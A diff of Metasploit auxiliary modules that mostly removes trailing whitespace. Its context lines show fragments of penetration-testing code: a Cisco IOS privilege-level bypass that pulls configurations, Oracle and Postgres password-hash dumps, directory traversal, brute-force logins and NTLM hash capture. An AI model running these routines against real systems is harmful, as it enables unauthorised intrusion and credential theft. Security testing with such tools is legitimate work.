@ -15,13 +15,13 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
||||
# Include Cisco utility methods
|
||||
include Msf::Auxiliary::Cisco
|
||||
|
||||
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
16.upto(99) do |level|
|
||||
res = send_request_cgi({
|
||||
'uri' => "/level/#{level}/exec/show/version/CR",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
|
||||
print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
|
||||
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "/level/#{level}/exec/show/config/CR",
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
|
||||
if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
|
||||
config = $2.strip
|
||||
print_good("#{rhost}:#{rport} Processing the configuration file...")
|
||||
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
|
||||
end
|
||||
|
||||
|
||||
break
|
||||
end
|
||||
end
|
||||
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}"
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
|
||||
out = "Adobe ColdFusion 8"
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
|
||||
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
|
||||
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
|
||||
out = "Adobe ColdFusion 9"
|
||||
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
|
||||
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'~',
|
||||
''
|
||||
]
|
||||
|
||||
|
||||
conn = false
|
||||
|
||||
tpath = datastore['PATH']
|
||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
dm = datastore['NoDetailMessages']
|
||||
|
||||
|
||||
|
||||
|
||||
extensions << datastore['EXT']
|
||||
|
||||
|
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
|
||||
queue << testf.strip
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Detect error code
|
||||
#
|
||||
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
|
||||
# banner (ex: Sun Java System Application Server 9.x)
|
||||
|
@ -224,7 +224,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
edition, version, banner = get_version(res)
|
||||
target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{datastore['PATH'].to_s}"
|
||||
print_status("#{target_url} - GlassFish - Attempting authentication")
|
||||
|
||||
|
||||
if (version == '2.x' or version == '9.x' or version == '3.0')
|
||||
try_glassfish_auth_bypass(version)
|
||||
end
|
||||
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def find_auth_uri_and_scheme
|
||||
|
||||
|
||||
path_and_scheme = []
|
||||
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
||||
paths = [datastore['AUTH_URI']]
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
/Management.asp
|
||||
}
|
||||
end
|
||||
|
||||
|
||||
paths.each do |path|
|
||||
res = send_request_cgi({
|
||||
'uri' => path,
|
||||
|
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
|
||||
print_error("You need need to set AUTH_URI when using PUT Method !")
|
||||
return
|
||||
|
@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
success = false
|
||||
proof = ""
|
||||
|
||||
|
||||
ret = do_http_login(user,pass,@scheme)
|
||||
return :abort if ret == :abort
|
||||
if ret == :success
|
||||
|
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
return :fail
|
||||
end
|
||||
|
||||
|
||||
def do_http_auth_digest(user,pass,requesttype)
|
||||
path = datastore['AUTH_URI'] || "/"
|
||||
begin
|
||||
|
@ -284,14 +284,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
#'DigestAuthIIS' => false,
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass
|
||||
}, 25)
|
||||
}, 25)
|
||||
end
|
||||
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("#{target_url} not responding")
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
return :abort if (res.code == 404)
|
||||
|
||||
if (res.code == 200) or (res.code == 201)
|
||||
@ -135,7 +135,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
||||
vprint_status("No filename specified. Using: #{path}")
|
||||
end
|
||||
|
||||
|
||||
#Upload file
|
||||
res = do_put(path, data)
|
||||
vprint_status("Reply: #{res.code.to_s}")
|
||||
|
|
|
@ -55,11 +55,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
return results
|
||||
end
|
||||
|
||||
|
||||
def translate(ip)
|
||||
ip.split('.')
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
result = resolve(ip)
|
||||
if result != 0
|
||||
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif threatnum > 75 then
|
||||
threat = "over 1 million"
|
||||
end
|
||||
|
||||
|
||||
typenum = breakup[3]
|
||||
typestring = case typenum
|
||||
when '0' then 'Search Engine'
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
"Unknown"
|
||||
end
|
||||
|
||||
|
||||
print_status ""
|
||||
print_status "#{ip} resloves to #{result} which means: #{typestring}"
|
||||
print_status "=> it was last seen #{lastseen} day ago and has a threat score of #{threatnum} or \'#{threat} spam messages\'"
|
||||
|
|
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'ctype' => 'text/plain',
|
||||
|
||||
}, 20)
|
||||
|
||||
|
||||
if res
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if(res.body and />(JBoss[^<]+)/.match(res.body) )
|
||||
print_error("#{rhost}:#{rport} JBoss error message: #{$1}")
|
||||
end
|
||||
|
||||
|
||||
apps = [ '/jmx-console/HtmlAdaptor',
|
||||
'/status',
|
||||
'/web-console/ServerInfo.jsp',
|
||||
|
@ -66,12 +66,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'/web-console/Invoker',
|
||||
'/invoker/JMXInvokerServlet'
|
||||
]
|
||||
|
||||
|
||||
print_status("#{rhost}:#{rport} Checking http...")
|
||||
apps.each do |app|
|
||||
check_app(app)
|
||||
end
|
||||
|
||||
|
||||
ports = {
|
||||
# 1098i, 1099, and 4444 needed to use twiddle
|
||||
1098 => 'Naming Service',
|
||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
module will attempt to download the Majordomo config.pl file.
|
||||
},
|
||||
'Author' => ['Nikolas Sotiriu'],
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '70762'],
|
||||
|
@ -87,10 +87,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else
|
||||
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')
|
||||
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")
|
||||
|
||||
|
||||
# Transform HTML entities back to the original characters
|
||||
file_data = file_data.gsub(/\>\;/i, '>').gsub(/\<\;/i, '<').gsub(/\"\;/i, '"')
|
||||
|
||||
|
||||
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)
|
||||
return
|
||||
end
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptInt.new('RPORT', [ true, "The target port", 443]),
|
||||
OptString.new('VERSION', [ true, "OWA VERSION (2003, 2007, or 2010)", '2007'])
|
||||
], self.class)
|
||||
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('AD_DOMAIN', [ false, "Optional AD domain to prepend to usernames", '']),
|
||||
|
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
begin
|
||||
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => tpath,
|
||||
|
|
|
@ -13,7 +13,7 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
|
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("There was an error reading the MySQL User Table")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if row[0]== "test"
|
||||
mysql_schema[row[0]]= get_tbl_names(row[0])
|
||||
end
|
||||
end
|
||||
end
|
||||
report_other_data(mysql_schema)
|
||||
end
|
||||
|
||||
|
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
|
||||
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def verbose; datastore['VERBOSE']; end
|
||||
|
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif (version == 10)
|
||||
postrequest = "username=#{user}&password=#{pass}&connectID=#{sid}&report=&script=&dynamic=&type=&action=&variables=&event=login"
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'version' => '1.1',
|
||||
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("Unexpected Response of: #{res.code}")#''
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("#{msg} - #{e}")
|
||||
return :abort
|
||||
|
|
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def hostport
|
||||
[target_host,rport].join(":")
|
||||
end
|
||||
|
||||
|
||||
def uri
|
||||
datastore['URI'] || "/isqlplus/"
|
||||
end
|
||||
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error "#{msg} Cannot connect"
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE,Errno::ECONNRESET => e
|
||||
print_error e.message
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def get_oracle_version(ip)
|
||||
|
|
|
@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
include Msf::Exploit::ORACLE
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Oracle Password Hashdump',
|
||||
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => %Q{
|
||||
This module dumps the usernames and password hashes
|
||||
from Oracle given the proper Credentials and SID.
|
||||
These are then stored as loot for later cracking.
|
||||
These are then stored as loot for later cracking.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -34,23 +34,23 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
return if not check_dependencies
|
||||
|
||||
|
||||
#Checks for Version of Oracle, 8g-10g all behave one way, while 11g behaves differently
|
||||
#Also, 11g uses SHA-1 while 8g-10g use DES
|
||||
is_11g=false
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
|
||||
|
||||
if ver.nil?
|
||||
print_error("An Error has occured, check your OPTIONS")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
unless ver.empty?
|
||||
if ver[0].include?('11g')
|
||||
is_11g=true
|
||||
print_status("Server is running 11g, using newer methods...")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
this_service = report_service(
|
||||
|
@ -59,14 +59,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:name => 'oracle',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Oracle Server Hashes',
|
||||
'Ident' => 1,
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
)
|
||||
|
||||
#Get the usernames and hashes for 8g-10g
|
||||
begin
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
tbl << row
|
||||
end
|
||||
end
|
||||
#Get the usernames and hashes for 11g
|
||||
#Get the usernames and hashes for 11g
|
||||
else
|
||||
query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \'ANONYMOUS\''
|
||||
results= prepare_exec(query)
|
||||
|
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
tbl << row
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
rescue => e
|
||||
print_error("An error occured. The supplied credentials may not have proper privs")
|
||||
|
@ -99,14 +99,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
print_status("Hash table :\n #{tbl}")
|
||||
report_hashes(tbl.to_csv, is_11g, ip, this_service)
|
||||
|
||||
|
||||
schema= get_schema()
|
||||
unless schema.nil? or schema.empty?
|
||||
report_other_data(schema,ip)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def get_schema
|
||||
#Grabs the Database and table names for storage
|
||||
#These names will be sued later to seed wordlists for cracking
|
||||
|
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
schema[db]= tables
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
return schema
|
||||
end
|
||||
|
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],
|
||||
[ 'CVE', '1999-0502'], # Weak password CVE
|
||||
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
|
||||
[ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']
|
||||
],
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def sid
|
||||
datastore['SID'].to_s
|
||||
end
|
||||
|
||||
|
||||
def nmap_build_args(credpath)
|
||||
nmap_reset_args
|
||||
nmap_append_arg "-P0"
|
||||
|
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("POP3 server does not appear to be running")
|
||||
return :abort
|
||||
end
|
||||
|
||||
|
||||
vprint_status("#{target} - Trying user:'#{user}' with password:'#{pass}'")
|
||||
cmd = "USER #{user}\r\n"
|
||||
pop3_send(cmd,!@connected)
|
||||
|
|
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'Description' => %Q{
|
||||
This module extracts the usernames and encrypted password
|
||||
hashes from a Postgres server and stores them for later cracking.
|
||||
hashes from a Postgres server and stores them for later cracking.
|
||||
},
|
||||
'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
|
||||
'License' => MSF_LICENSE
|
||||
|
@ -34,14 +34,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('DATABASE', [ true, 'The database to authenticate against', 'postgres']),
|
||||
])
|
||||
deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
|
||||
#Query the Postgres Shadow table for username and password hashes and report them
|
||||
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
|
||||
|
||||
|
||||
#Error handling routine here, borrowed heavily from todb
|
||||
case res.keys[0]
|
||||
when :conn_error
|
||||
|
@ -59,21 +59,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when :complete
|
||||
print_status("Query appears to have run successfully")
|
||||
end
|
||||
|
||||
|
||||
this_service = report_service(
|
||||
:host => datastore['RHOST'],
|
||||
:port => datastore['RPORT'],
|
||||
:name => 'postgres',
|
||||
:proto => 'tcp'
|
||||
)
|
||||
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'Postgres Server Hashes',
|
||||
'Ident' => 1,
|
||||
'Columns' => ['Username', 'Hash']
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
res[:complete].rows.each do |row|
|
||||
next if row[0].nil? or row[1].nil?
|
||||
|
@ -93,11 +93,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
|
||||
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
|
||||
print_status("Hash Table has been saved: #{path}")
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -63,7 +63,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
verbose = datastore['VERBOSE']
|
||||
print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
|
||||
xs = 'http://www.w3.org/2001/XMLSchema'
|
||||
|
|
|
@ -138,10 +138,10 @@ class Metasploit4 < Msf::Auxiliary
|
|||
:data => {:proto => "soap", :users => users},
|
||||
:update => :unique_data
|
||||
)
|
||||
|
||||
|
||||
users.each do |output|
|
||||
print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
|
||||
end
|
||||
end
|
||||
return
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
|
|
|
@ -136,11 +136,11 @@ class Metasploit4 < Msf::Auxiliary
|
|||
:data => {:proto => "soap", :env => env},
|
||||
:update => :unique_data
|
||||
)
|
||||
|
||||
|
||||
env.each do |output|
|
||||
print_status("#{output[0]}")
|
||||
end
|
||||
|
||||
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
return
|
||||
|
|
|
@ -97,7 +97,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + "#{datastore['RFILE']}" + '</filename></' + ns1 + '>' + "\r\n"
|
||||
data << '</SOAP-ENV:Body>' + "\r\n"
|
||||
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
|
||||
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => "/#{datastore['URI']}",
|
||||
|
|
|
@ -161,7 +161,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
saptbl << [ output[0], output[1], output[2] ]
|
||||
end
|
||||
|
||||
print(saptbl.to_s)
|
||||
print(saptbl.to_s)
|
||||
return
|
||||
|
||||
elsif fault
|
||||
|
|
|
@ -149,7 +149,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
print_status("#{output[0]}")
|
||||
end
|
||||
|
||||
|
||||
|
||||
elsif fault
|
||||
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
|
||||
return
|
||||
|
|
|
@ -49,11 +49,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'SPECIAL',
|
||||
'TEMPORARY'
|
||||
]
|
||||
|
||||
|
||||
if val > (stypes.length - 1)
|
||||
return 'UNKNOWN'
|
||||
end
|
||||
|
||||
|
||||
stypes[val]
|
||||
end
|
||||
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
result = try_user_pass(user.downcase, pass)
|
||||
if result == :next_user
|
||||
print_status("Username is case insensitive")
|
||||
user = user.downcase
|
||||
user = user.downcase
|
||||
end
|
||||
end
|
||||
report_creds(user,pass)
|
||||
|
@ -231,7 +231,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def report_creds(user,pass)
|
||||
|
||||
|
||||
report_hash = {
|
||||
:host => rhost,
|
||||
:port => datastore['RPORT'],
|
||||
|
|
|
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (@coderesult == '501') && @domain.split(".").count > 2
|
||||
print_error "#{target} - MX domain failure for #{@domain}, trying #{@domain.split(/\./).slice(-2,2).join(".")}"
|
||||
cmd = 'MAIL FROM:' + " root@" + @domain.split(/\./).slice(-2,2).join(".") + "\r\n"
|
||||
smtp_send(cmd,!@connected)
|
||||
smtp_send(cmd,!@connected)
|
||||
if (@coderesult == '501')
|
||||
print_error "#{target} - MX domain failure for #{@domain.split(/\./).slice(-2,2).join(".")}"
|
||||
return :abort
|
||||
|
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif (@coderesult == '501')
|
||||
print_error "#{target} - MX domain failure for #{@domain}"
|
||||
return :abort
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def do_rcpt_enum(user)
|
||||
|
|
|
@ -45,20 +45,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Start the TFTP Server
|
||||
#
|
||||
def setup
|
||||
|
||||
|
||||
@path = datastore['SOURCE']
|
||||
@filename = @path.split(/[\/\\]/)[-1] #/
|
||||
|
||||
|
||||
# Setup is called only once
|
||||
print_status("Starting TFTP server...")
|
||||
@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
|
||||
|
||||
|
||||
# Register our file name and data
|
||||
::File.open(@path, "rb") do |fd|
|
||||
buff = fd.read(fd.stat.size)
|
||||
@tftp.register_file(@filename, buff)
|
||||
end
|
||||
|
||||
|
||||
@tftp.start
|
||||
add_socket(@tftp.sock)
|
||||
|
||||
|
|
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:type => 'snmp.users',
|
||||
:data => @users
|
||||
)
|
||||
|
||||
|
||||
|
||||
rescue ::SNMP::UnsupportedVersion
|
||||
rescue ::SNMP::RequestTimeout
|
||||
|
|
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_reply(r)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
idx += 1
|
||||
|
||||
end
|
||||
|
@ -245,10 +245,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if(pkt[1] =~ /^::ffff:/)
|
||||
pkt[1] = pkt[1].sub(/^::ffff:/, '')
|
||||
end
|
||||
|
||||
|
||||
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
|
||||
return if not asn
|
||||
|
||||
|
||||
snmp_error = asn.value[0].value rescue nil
|
||||
snmp_comm = asn.value[1].value rescue nil
|
||||
snmp_data = asn.value[2].value[3].value[0] rescue nil
|
||||
|
@ -260,7 +260,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
inf = snmp_info
|
||||
com = snmp_comm
|
||||
|
||||
|
||||
if(com)
|
||||
@found[pkt[1]]||={}
|
||||
if(not @found[pkt[1]][com])
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
}
|
||||
print_good("#{ip} Found Users: #{@users.uniq.sort.join(", ")} ")
|
||||
|
||||
|
||||
@users.each do |user|
|
||||
report_note(
|
||||
:host => rhost,
|
||||
|
@ -70,4 +70,4 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -110,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
info = "#{proto_from_fullname} #{user}:#{pass} (#{ip}:#{port})"
|
||||
s = start_session(self, info, merge_me, false, conn.lsock)
|
||||
|
||||
|
||||
# Set the session platform
|
||||
case proof
|
||||
when /Linux/
|
||||
|
|
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
server_thread = framework.threads.spawn("Module(#{self.refname})-Listener", false) { upnp_client_listener }
|
||||
|
||||
# TODO: Test to see if this scheme will work when pivoted.
|
||||
|
||||
|
||||
# Create an unbound UDP socket if no CHOST is specified, otherwise
|
||||
# create a UDP socket bound to CHOST (in order to avail of pivoting)
|
||||
udp_send_sock = Rex::Socket::Udp.create(
|
||||
|
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
usn_string = $1
|
||||
info << usn_string.to_s.strip
|
||||
end
|
||||
|
||||
|
||||
report_service(
|
||||
:host => addr,
|
||||
:port => port,
|
||||
|
|
|
@ -35,11 +35,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
targets = crack_phone_ranges(datastore['TARGETS'].split(","))
|
||||
connect
|
||||
|
||||
|
||||
::FileUtils.mkdir_p( datastore['OUTPUT_PATH'] )
|
||||
|
||||
|
||||
targets.each do |number|
|
||||
|
||||
|
||||
c = create_call
|
||||
begin
|
||||
::Timeout.timeout( datastore['CALL_TIME'] ) do
|
||||
|
@ -60,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ensure
|
||||
c.hangup rescue nil
|
||||
end
|
||||
|
||||
|
||||
print_status(" COMPLETED Number: #{number} State: #{c.state} Frames: #{c.audio_buff.length} DTMF: '#{c.dtmf}'")
|
||||
|
||||
|
||||
if c.audio_buff.length > 0
|
||||
opath = ::File.join( datastore['OUTPUT_PATH'], "#{number}.raw" )
|
||||
cnt = 0
|
||||
|
@ -77,5 +77,5 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Next call
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
prints the names of all exploit modules that would be used by
|
||||
the WebServer action given the current MATCH and EXCLUDE
|
||||
options.
|
||||
|
||||
|
||||
Also adds a 'list' command which is the same as running with
|
||||
ACTION=list.
|
||||
},
|
||||
|
|
|
@ -208,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
user = arg[:user]
|
||||
host = arg[:host]
|
||||
ip = arg[:ip]
|
||||
|
||||
|
||||
unless @previous_lm_hash == lm_hash and @previous_ntlm_hash == nt_hash then
|
||||
|
||||
@previous_lm_hash = lm_hash
|
||||
|
@ -268,7 +268,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Display messages
|
||||
domain = Rex::Text::to_ascii(domain)
|
||||
user = Rex::Text::to_ascii(user)
|
||||
user = Rex::Text::to_ascii(user)
|
||||
|
||||
capturedtime = Time.now.to_s
|
||||
case ntlm_ver
|
||||
|
|
|
@ -488,7 +488,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
lm_chall_message = lm_cli_challenge
|
||||
end
|
||||
|
||||
|
||||
|
||||
# Display messages
|
||||
if esn
|
||||
smb[:username] = Rex::Text::to_ascii(smb[:username])
|
||||
|
|
|
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
pwd = ::File.join(datastore['FTPROOT'], @state[c][:cwd])
|
||||
buf = ''
|
||||
|
||||
|
||||
begin
|
||||
Dir.new(pwd).entries.each do |ent|
|
||||
path = ::File.join(datastore['FTPROOT'], ent)
|
||||
|
@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
c.put "500 Access denied\r\n"
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
upath = ::File.expand_path(datastore['FTPROOT'])
|
||||
npath = ::File.expand_path(::File.join(datastore['FTPROOT'], @state[c][:cwd], arg))
|
||||
bpath = npath[upath.length, npath.length - upath.length]
|
||||
|
|
|
